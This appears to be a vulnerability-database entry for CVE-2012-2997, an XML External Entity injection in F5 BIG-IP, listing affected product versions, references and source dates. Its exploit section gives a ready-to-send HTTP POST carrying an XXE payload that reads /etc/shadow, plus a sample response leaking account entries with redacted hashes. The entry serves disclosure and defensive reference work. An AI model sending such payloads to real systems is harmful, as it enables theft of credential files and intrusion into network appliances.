ID
VAR-E-201301-0169
CVE
cve_id: | CVE-2012-2997 | Trust: 2.4 |
EDB ID
38233
TITLE
F5 Networks BIG-IP - XML External Entity Injection - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
F5 Networks BIG-IP - XML External Entity Injection. CVE-2012-2997CVE-89447 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | f5 | model: | networks big-ip | scope: | - | version: | - | Trust: 1.0 |
vendor: | f5 | model: | big-ip xml external entity | scope: | eq | version: | 11.2.0 | Trust: 0.5 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 10.2.40 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.0.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf5 | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/57496/info
F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks.
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
The response includes the content of the file:
<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
XML External Entity Injection
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | xxe | Trust: 0.5 |
CREDITS
anonymous
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2012-2997 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 38233 | Trust: 1.9 |
db: | BID | id: | 57496 | Trust: 1.9 |
db: | EDBNET | id: | 60633 | Trust: 0.6 |
db: | PACKETSTORM | id: | 119738 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-2997 | Trust: 2.1 |
url: | https://www.securityfocus.com/bid/57496/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/38233/ | Trust: 0.6 |
url: | https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-0_f5_big-ip_xml_external_entity_injection_v10.txt | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/38233 | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html | Trust: 0.3 |
url: | http://www.f5.com/products/big-ip/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 57496 |
db: | PACKETSTORM | id: | 119738 |
db: | EXPLOIT-DB | id: | 38233 |
db: | EDBNET | id: | 60633 |
LAST UPDATE DATE
2022-07-27T09:15:48.287000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 57496 | date: | 2013-01-21T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 57496 | date: | 2013-01-21T00:00:00 |
db: | PACKETSTORM | id: | 119738 | date: | 2013-01-22T23:44:44 |
db: | EXPLOIT-DB | id: | 38233 | date: | 2013-01-21T00:00:00 |
db: | EDBNET | id: | 60633 | date: | 2013-01-21T00:00:00 |